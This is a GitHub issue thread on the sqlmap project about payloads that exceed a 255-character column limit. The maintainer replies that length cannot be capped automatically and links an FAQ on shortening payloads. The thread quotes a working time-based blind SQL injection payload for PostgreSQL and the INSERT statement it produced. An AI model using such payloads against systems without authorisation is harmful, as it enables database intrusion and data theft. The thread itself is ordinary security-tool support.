### ISSUE TITLE
Max Length for Injection Strings

### ISSUE THREAD

**Issue by tobiasimbus** [sqlmapproject/sqlmap#4912]
**Is your feature request related to a problem? Please describe.**
I don't know if this already exists, I haven't found anything. I currently have the problem that my payload can be a maximum of 255 characters long. If the payload exceeds the length it comes to an 
"ERROR: value too long for type character varying(255)" error on the web application.
The payload generated by sqlmap, for example:
`'||(SELECT (CHR(76)||CHR(114)||CHR(101)||CHR(104)) WHERE 4708=4708 AND 4993=(CASE WHEN (ASCII(SUBSTRING((SELECT COALESCE(CAST(COUNT(DISTINCT(schemaname)) AS VARCHAR(10000))::text,(CHR(32))) FROM pg_tables)::text FROM 1 FOR 1))>51) THEN (SELECT 4993 FROM PG_SLEEP(5)) ELSE 4993 END))||'`
has 285 characters:
Complete error in the database looks like this:
`INSERT INTO testtable (test_filename, test_guid) VALUES (''||(SELECT (CHR(76)||CHR(114)||CHR(101)||CHR(104)) WHERE 4708=4708 AND 4993=(CASE WHEN (ASCII(SUBSTRING((SELECT COALESCE(CAST(COUNT(DISTINCT(schemaname)) AS VARCHAR(10000))::text,(CHR(32))) FROM pg_tables)::text FROM 1 FOR 1))>51) THEN (SELECT 4993 FROM PG_SLEEP(5)) ELSE 4993 END))||'', 'xxxxxxx')
org.postgresql.util.PSQLException: ERROR: value too long for type character varying(255)`

**Describe the solution you'd like**
It would be great if you can specify a parameter in the sqlmap call that limits the length.

**Comment by stamparm** [comment]
There is no way for sqlmap to automagically constraint the payload size. Either payload works or not. 

Nonetheless, you can try to use https://github.com/sqlmapproject/sqlmap/wiki/FAQ#how-can-i-shorten-the-payloads-injected-by-sqlmap
